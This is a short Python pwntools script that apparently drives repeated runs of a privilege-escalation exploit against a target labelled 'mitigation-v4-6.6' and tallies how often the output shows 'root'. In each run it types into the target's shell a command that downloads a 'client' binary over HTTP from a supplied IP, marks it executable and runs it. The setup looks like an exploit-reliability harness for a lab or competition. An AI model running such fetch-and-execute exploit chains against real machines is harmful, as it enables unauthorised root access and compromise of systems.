from pwn import *
import sys

context.log_level = 'CRITICAL'
my_dict = {}

import random
ip = sys.argv[1]
port = int(sys.argv[2])
count = int(sys.argv[3])
success = 0

for i in range(count):
    print(f'#{i+1}')
    p = process(["./exploit/mitigation-v4-6.6/server", "--port", str(port)])
    q = process(["./local_runner.sh", "mitigation-v4-6.6"])
    q.sendlineafter(b"user@", f"cd /tmp && wget http://{ip}:3000/client && chmod +x ./client && ./client --ip {ip} --port {port}".encode())
    try:
        data = q.recvall(timeout=10)
        print(data.decode())
    except:
        pass

    if b'root' in data:
        success += 1

    p.close()
    q.close()
    port += 2
    print(f'Success rate: {success}/{i+1}')